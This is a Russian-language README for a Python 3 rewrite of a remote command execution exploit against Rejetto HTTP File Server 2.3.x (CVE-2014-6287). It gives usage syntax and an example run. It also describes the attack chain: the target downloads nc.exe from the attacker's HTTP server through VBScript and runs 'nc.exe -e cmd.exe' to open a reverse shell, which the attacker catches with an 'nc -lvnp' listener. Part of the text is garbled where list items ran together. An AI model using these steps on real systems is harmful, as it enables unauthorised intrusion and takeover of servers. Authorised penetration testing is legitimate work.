
Эксплойт удаленного выполнения команд для Rejetto HTTP File Server 2.3.x (CVE-2014-6287), переписанный на Python 3 для современного тестирования на проникновение.
Это переписанная на Python 3 версия классического эксплойта удалённого выполнения команд (RCE), нацеленного на Rejetto HTTP File Server (HFS) v2.3.x, использующая уязвимость, обозначенную как CVE-2014-6287.
Первоначально обнаружена Avinash Kumar Thapa aka "-Acid", эта версия улучшает переносимость и удобство использования, предоставляя полную параметризацию и современную совместимость.
Данный инструмент предоставляется исключительно в образовательных целях и для авторизованного тестирования на проникновение. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, незаконно и неэтично.
nc.exenc.exe с помощью VBScriptnc.exenc.exe -e cmd.exe для установки обратной оболочкиpython3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
Пример:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
Требования:
- HTTP-сервер, раздающий nc.exe:
python3 -m http.server 8000
- Прослушиватель:
nc -lvnp 4444